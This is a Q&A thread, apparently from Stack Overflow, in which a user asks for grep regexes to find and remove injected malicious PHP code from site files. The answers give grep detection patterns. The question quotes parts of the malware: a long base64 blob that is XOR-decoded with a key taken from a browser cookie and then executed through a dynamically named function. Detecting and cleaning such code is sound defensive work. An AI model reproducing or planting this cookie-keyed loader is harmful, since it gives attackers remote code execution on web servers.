# difficulty in building a proper regex to capture a string

Tags: regex, ubuntu, grep

I am trying to build a regex to find a string for malicious code in a file, but not able to achieve how I go about it.
The regex I am using is like

`grep -rle '[^\ ]\{200,\}'`

also

`grep -rle '[^\s]\{200,\}'`

and this:

`grep -rle '[^\h]\{200,\}'`

The string in question I am trying to capture is like :

```
$nzrnwnp =
                'KT8ndGlvKTtmJyA6YnJldGl2ZGVydGVuaGlzY2VzIT0nbGVyLT5oc2Fnb21hcHJvZjo'.
                '6YXRjc1swZnVuWzNdbmcgYW5zbiAoaW1ldGhpPUBvcnM7c2VsLCRtZXJFOV06cnlbfS'.
                'R0cm4gZVtdcHViJHRoQVVUdXRwcGVuWydjbyouICRlKD8+XG4ieF0sc2VuaGlzdGhpc'.
                'y0+bWltJ2xvYWxsaGlzICR0dGhpJGF2cHRpJ0FVJy0tJ1NNRnJvcmVhY3RpLT5oZGVy'.
                'cy0+ZXN1LT5McmV0YXhMaWYoZGViQ29udGlvY29tSU5VcnJhQVVUbHM9b3Jfbyc9Pjp'.
                'bZz0nc29yUCcsb247KXskYWdlKXtjc3NfZXNzbnN0eyR0YWxpdXQsPScnJGhvKz0zdD'.
                't9cignKCdUYXkoaWYoXT0nbmQgc2Vycm5vZGF0aGlzaGlzZW50J3NpMSw0YWNobiIsc'.
                '3VsZW5kYW5kdHJfZWNocml2IiIpKj8pcy0+aW5sLnsnbHNlQWx0V0xFcm4gZ2U9JHNp'.
                'J1thTGluRV9Mcz10Jz0+Pz4oc3RyJG1hJyxibj0+PnNlZCBzO31pdGl2bmNvbnVsZXB'.
                '0cnRlcm4gZ2xlaXZlfX1yfWVsdCwkKCk7OiRtfFtePzpbYWx0JGxvb2RlcnVlXFtcPy'.
                'EodEVyb24gYnN0TVRQTElOKSl7aXRpJGlzcm5vY2UobmQoPT4kcm4gdCwndXJub25uY'.
                'XJ5dCwnW1x4ZHlFeXBlcm5hcGU9PWdlOjpEQUwpZnJvbihzeT1kJHJlcik+L1wvVCcs'.
                'c2FnOiAkbWVvZWZhdXJsLT5zbDskLic6dW50YXJ5ZTt9cm93c2Ugb2R5ICRhX2Nhcy0'.
                '+VDt9O31jJnN1aWQsJyl7ZXNzbWF0c3BvMSw0bmxpZigkOiAncy0+e2lmJHRodHkoTE'.
                'UpY3JsdHJvX2Vtc2NpdGluXSk7RGViZXJyKXt0OFx4bXB0ZWRJbmRhbmNlaXN0RXJyd'.
                'GhpdGlvKXtybG9kJHBvaWYobGFzcnJvYW1zJHNpT04pZmF1O31zdGhpb2RlYS1mYnVn'.
                'ZWQtMjskZG9fc2V7bigkaWYoeyRibXlYYW1lJz09PT4kJGF1b2R5WzAtO319bmUoPSc'.
```

**update ending part of file:**

```
'dH8scihxEmxHFhY5EFNFWwQCUBkfHhJKQxZnExhCHDpkdTFvJGZpEHw2MDY9fnpkMUZ'.
                'oGGUZHE8='
        ), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_ebnikc($nzrnwnp);

        function ebnikc ($xcwhte, $fwlllnr) { return $xcwhte ^ str_repeat ($fwlllnr, ceil (strlen ($xcwhte) / strlen ($fwlllnr))); }
?>
```

Comment: yes this is the string stored in a file. As regarding before this string. it is from the start and ending part I am adding now in the update.

Comment: as regarding what I want, I want to find files containing such strings and remove them or update them if the string is only in part with other code.

Answer (score 1, accepted):

You can use this `gnu-grep` command to file such files with this string:

```
grep -rlzP "\\$\\w+\\s*=(\\s*'[a-zA-Z0-9+=]{60,}'\\.)+" file
```

Since we're using double quotes, we need to use double escaping in our regex.

**Regex details**

- Finds a variable name that start with `$` followed by 1 or more word characters
- `=` can be surrounded by whitespaces
- value of variable should be surrounded by singe quotes comprising 60+ characters specified in `[a-zA-Z0-9+=]`
- `-z` option in `grep` makes `grep` treat whole file as a single line.

Comment: yes it does, but problem is it lists all the other files, which don't have such string.

Comment: Try this command meanwhile: **`grep -rlzP "\\$\\w+\\s*=(\\s*'[a-zA-Z0-9+=]{60,}'\\.)+" file`**

Comment: Yes I am trying to match based on length ignoring horizontal spaces, which in my opinion should work. The string is concatenated using `.` and some spaces. so in effect it is a single string.

Comment: Yes. that did work perfectly I think if you can add that in your answer and explain that a bit, it will help me understand and other users as well.

Answer (score 0):

changed your command line slightly, works for me:

```
grep -rlP '\S{60,}'
```